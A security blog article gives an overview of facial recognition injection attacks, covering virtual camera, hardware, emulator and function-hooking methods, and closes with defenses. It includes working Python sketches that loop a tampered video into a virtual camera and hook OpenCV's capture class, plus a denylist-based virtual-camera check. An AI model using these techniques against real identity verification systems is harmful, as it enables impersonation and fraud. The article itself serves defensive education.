
Facial Recognition Injection Attacks

An Overview

by Yann Santschi
on March 18, 2025
time to read: 10 minutes

Keypoints

Facial Recognition Injection Attacks, also known as Video Injection Attacks, are becoming increasingly common. This article showcases different types of attacks and prevention methods.

  • Facial Recognition Injection Attacks involve injecting tampered video feeds or deepfakes into facial recognition systems to bypass security
  • Current attack types include Virtual Video Injections, Hardware-Based Video Injections, Device Emulation, and Function Hooking
  • Preventing these attacks requires a multi-layered defense, including device integrity checks, anti-spoofing software, and awareness of attack methods
  • Liveness detection and video stream integrity checks are important for detecting tampered video, though these attacks are difficult to fully prevent

Presumably, most people have encountered facial recognition software, particularly as an authentication method that verifies identity through something you are. However, the camera or video streams used by these systems can be manipulated or injected with fraudulent content, often leveraging advanced Deepfake technologies or physical disguises to deceive biometric security measures.

Introduction

ENISA describes in its publication, ID Proofing Good Practices, that facial recognition injection attacks occur five times more frequently than presentation attacks. In particular, video injection attacks leveraging deepfake technologies have gained prominence among criminals and nation-state actors.

This article provides a high-level overview of how facial recognition injection attacks operate, alongside recommended practices to secure system interfaces against these sophisticated threats. It was developed in collaboration with Mobai, a Norwegian start-up specializing in biometric facial recognition technology, where the author completed an internship.

Facial recognition is widely utilized as an authentication factor by verifying identity through biometric attributes—often termed something you are. Attacks on facial recognition systems generally fall into two categories: Presentation attacks and injection attacks. Presentation attacks involve presenting deceptive materials, known as Presentation Attack Instruments (PAIs), such as photographs or 3D masks, to fool biometric sensors.

In contrast, facial recognition injection attacks, or video injection attacks, involve inserting manipulated videos or images directly into the camera stream using Injection Attack Instruments (IAIs). Attackers intercept or alter the camera feed, replacing it with fabricated content like images, pre-recorded videos, or deepfakes.

Deepfakes are not the focus of this article; Andrea Hauser has written several in-depth articles about them.

Attack Vectors

ENISA uses the following illustration to show where a fraudulent video is injected when attacking a facial recognition system: the point at which the legitimate camera feed is intercepted and replaced with a tampered video.

Where video injection attacks happen in biometric proofing systems (Source: ENISA RIDP Good Practices)

Virtual Video Injections

The simplest form of attack uses a virtual camera on the device. A virtual camera, as shown later, serves primarily as a way to inject manipulated videos into a video stream. Such attacks can be executed on both desktop computers and mobile devices. Popular software solutions providing virtual camera capabilities include OBS and ManyCam. These tools are widely used in live streaming and video conferencing to overlay content onto video feeds. Executing this type of attack is as straightforward as selecting the virtual camera input in an application such as Zoom and then choosing the desired manipulated media, as sketched below. A practical demonstration using OBS can be viewed in the following video by GuideRealm.
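
To illustrate how little effort such an injection requires, the following minimal Python sketch loops a pre-recorded (or deepfaked) video file into a virtual camera device. It assumes the pyvirtualcam and OpenCV packages are installed and that a virtual camera backend such as the OBS Virtual Camera is available on the system; the file name injected.mp4 is a placeholder.

```python
# Minimal sketch: loop a pre-recorded video into a virtual camera device.
# Assumes pyvirtualcam + OpenCV and an installed virtual camera backend (e.g. OBS).
import cv2
import pyvirtualcam

WIDTH, HEIGHT, FPS = 1280, 720, 30
source = cv2.VideoCapture("injected.mp4")  # placeholder for the tampered video

with pyvirtualcam.Camera(width=WIDTH, height=HEIGHT, fps=FPS) as cam:
    print(f"Virtual camera started: {cam.device}")
    while True:
        ok, frame = source.read()
        if not ok:  # restart the clip when it ends
            source.set(cv2.CAP_PROP_POS_FRAMES, 0)
            continue
        frame = cv2.resize(frame, (WIDTH, HEIGHT))
        frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)  # OpenCV delivers BGR, pyvirtualcam expects RGB
        cam.send(frame)
        cam.sleep_until_next_frame()
```

Any application that lets the user pick a camera, including video conferencing tools or browser-based onboarding flows, will then see this stream as an ordinary webcam.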

Specialized real-time face-swapping and deepfake software solutions exist and are used in combination with the virtual camera software mentioned above. Notable open-source projects providing such capabilities are Deep-Live-Cam, DeepFaceLive and Avatarify Python, although DeepFaceLive was archived on November 13th, 2024. For in-depth demonstrations, several videos are available online; a recommendation is the German-language video by AlexiBexi, which explains Deep-Live-Cam in great detail.

Hardware-Based Video Injections

Hardware-based video injections represent another approach, similar in concept to virtual camera injections but using physical hardware to inject tampered video or image streams. Typically, this involves external adapters such as video capture cards, which accept input via HDMI and present themselves to the client device as camera inputs. These adapters commonly connect through USB-C ports, although direct camera input adapters are also viable but require specialized connections.

Implementing hardware injections, especially on mobile devices, often involves physically removing or replacing internal cameras. Resources such as iFixit provide detailed teardown instructions for various devices. Mobile devices frequently use interfaces such as the MIPI Camera Serial Interface (CSI-2) connected via flat flex cable (FPC) connectors. While CSI-to-HDMI adapters exist, particularly those designed for Raspberry Pi systems, compatibility is not universal due to variations in pin layouts, connector types, and voltage levels. A documented proof of concept was achieved and shown by FaceTec in their NIST FRVT-PAD Commentary of 2022, although the referenced demonstration channel has since been removed from YouTube.

Rooting mobile devices may be necessary to facilitate the required modifications. Alternatively, a Raspberry Pi running LineageOS, an open-source Android distribution, can serve as an effective platform for testing facial recognition applications and attacks, particularly due to its native support for CSI-to-HDMI adapters.
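
From the client's point of view, a USB capture card is indistinguishable from a regular webcam. The following sketch, assuming a host with OpenCV installed, simply probes the first few camera indices and reads a frame from each; a connected HDMI capture card shows up and delivers frames exactly like a built-in camera would, which is what makes this attack hard to spot at the application layer.

```python
# Sketch: probe the first few camera indices; an HDMI capture card enumerates
# and delivers frames exactly like a built-in webcam would.
import cv2

for index in range(4):                      # probe a handful of device indices
    cap = cv2.VideoCapture(index)
    if cap.isOpened():
        ok, frame = cap.read()
        print(f"Device {index}: frame={'ok' if ok else 'none'}",
              frame.shape if ok else "")
        cap.release()
```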

Device Emulation

Device emulation attacks leverage virtual environments to intercept and manipulate camera-related system calls. Rather than interfacing with physical hardware, these calls are redirected to virtual cameras and sensors provided by the emulator. The virtual operating system executes these system calls, allowing the injection of fabricated video streams without modifying physical hardware.
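
As a sketch of this approach on Android, the stock Android Emulator can be told to back the emulated camera with an arbitrary host webcam, which may itself be a virtual camera fed with tampered video as described above. The AVD name Pixel_6_API_34 below is a placeholder, and the emulator binary from the Android SDK is assumed to be on the PATH.

```python
# Sketch: start an Android Virtual Device whose back camera is backed by host
# webcam 0, which could be a virtual camera serving tampered video.
import subprocess

subprocess.run([
    "emulator",
    "-avd", "Pixel_6_API_34",     # placeholder AVD name
    "-camera-back", "webcam0",    # route host camera 0 into the emulated back camera
])
```

Any facial recognition app installed inside the emulated device then receives the injected feed through the normal Android camera APIs.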

Function Hooking

Function hooking is a sophisticated method that directly intercepts and modifies the facial recognition application’s system calls on the actual device. Unlike device emulation, function hooking alters function calls in real time while the video is being captured, typically with the application running under a debugger or instrumentation framework. Attackers achieve this by replacing the function that captures the video stream with one that returns the tampered video stream instead.

Implementing function hooking requires advanced technical capabilities, including root access, reverse-engineering (decompilation), detailed knowledge of system call mechanisms, and the ability to craft malicious functions. Due to its complexity and dependency on specific technologies and applications, function hooking attacks are highly specialized and customized for each targeted scenario.
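
The underlying principle can be illustrated in a few lines of Python by replacing OpenCV's VideoCapture at module level, so that victim code asking for camera frames silently receives frames from a prepared video instead. This is only a simplified, Python-level illustration; real attacks hook native camera functions on a rooted device, typically with instrumentation frameworks such as Frida. The file name injected.mp4 is again a placeholder.

```python
# Illustration of the hooking principle: swap out the capture class so callers
# receive frames from a tampered video instead of the real camera.
import cv2

_RealVideoCapture = cv2.VideoCapture            # keep a handle to the real class

class HookedVideoCapture:
    """Stands in for cv2.VideoCapture but serves frames from a tampered video."""
    def __init__(self, source):
        # The requested source (e.g. camera index 0) is ignored on purpose.
        self._tampered = _RealVideoCapture("injected.mp4")  # placeholder file
    def isOpened(self):
        return self._tampered.isOpened()
    def read(self):
        return self._tampered.read()            # injected frame instead of camera frame
    def release(self):
        self._tampered.release()

cv2.VideoCapture = HookedVideoCapture            # install the hook

# The "victim" code below is unchanged and unaware of the substitution.
camera = cv2.VideoCapture(0)
ok, frame = camera.read()                        # actually a frame from injected.mp4
camera.release()
```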

Preventing and Detecting Facial Recognition Injection Attacks

Unlike Presentation Attack Instruments (PAIs), Injection Attack Instruments (IAIs) cannot be fully detected using traditional methods such as liveness detection. Typically, liveness detection mechanisms rely on factors including motion analysis, 3D depth sensing, and the evaluation of light reflections and shadows. Detecting or preventing IAIs poses significant challenges because these attacks involve compromised devices under the attacker’s control.

In live video scenarios, such as online job interviews, IAIs become particularly difficult to identify, as detection relies heavily on the awareness of the interviewers or other participants. This vulnerability has notably been exploited in incidents involving live deepfake attacks attributed to North Korean APT groups. One well-documented example is described in the article KnowBe4 Interviews a Fake North Korean Employee.

Effective detection strategies against IAIs extend beyond user awareness. These methods include integrity checks at the device, camera, and video stream levels. Integrity verification examines hardware authenticity, software legitimacy, and driver conformity against established baselines and known secure configurations. Furthermore, anti-spoofing software and advanced algorithms play a critical role in facial recognition systems to mitigate such attacks.
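
One building block of such integrity checks is comparing the reported camera hardware and drivers against a baseline of expected devices and rejecting known virtual-camera products. The following sketch assumes a Linux host with V4L2 and flags devices whose names match a small, purely illustrative denylist; production systems combine this with many more signals, such as driver signatures, device attestation, and stream analysis.

```python
# Sketch of a simple device-integrity check on Linux: flag video devices whose
# reported names match known virtual-camera products. Illustrative denylist only.
from pathlib import Path

VIRTUAL_CAMERA_HINTS = ("obs", "virtual", "v4l2loopback", "manycam")

def suspicious_video_devices():
    findings = []
    for dev in sorted(Path("/sys/class/video4linux").glob("video*")):
        name = (dev / "name").read_text().strip()
        if any(hint in name.lower() for hint in VIRTUAL_CAMERA_HINTS):
            findings.append((f"/dev/{dev.name}", name))
    return findings

for device, name in suspicious_video_devices():
    print(f"Possible injection vector: {device} ({name})")
```

Such a check is easily bypassed on a device fully controlled by the attacker, which is why it can only ever be one layer of a broader defense.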

Finally, from an organizational and technical perspective, the standard CEN/TS 18099:2025 provides comprehensive guidelines and insights into managing biometric security threats. Additionally, the International Organization for Standardization (ISO) is developing a standard under the working title NP 25456, Information technology — Biometrics — Biometric data injection attack detection, which aims to establish standardized practices for identifying and mitigating biometric injection attacks.

Conclusion

Facial recognition systems are becoming crucial for security and authentication. At the same time, attacks against them are steadily growing in sophistication and maturity. Facial recognition injection attacks pose a significant threat because they bypass traditional security methods: they use tools such as deepfakes, virtual cameras, and hardware devices to manipulate video streams, making detection difficult.

To mitigate these threats, a multi-layered defense approach is necessary. Integrating device integrity checks, anti-spoofing software, and secure system interfaces is essential. Awareness of attack methods, like virtual camera manipulation and deepfake injection, is critical for protecting biometric systems.

About the Author

Yann Santschi

Yann Santschi completed an apprenticeship as a systems engineer at the Swiss Stock Exchange and then worked as a cyber security consultant at one of the Big Four consulting firms. He is currently pursuing his Bachelor’s degree in Information and Cyber Security with a major in Attack Specialist and Penetration Testing at HSLU. His focus is on web applications, network security, and social engineering.
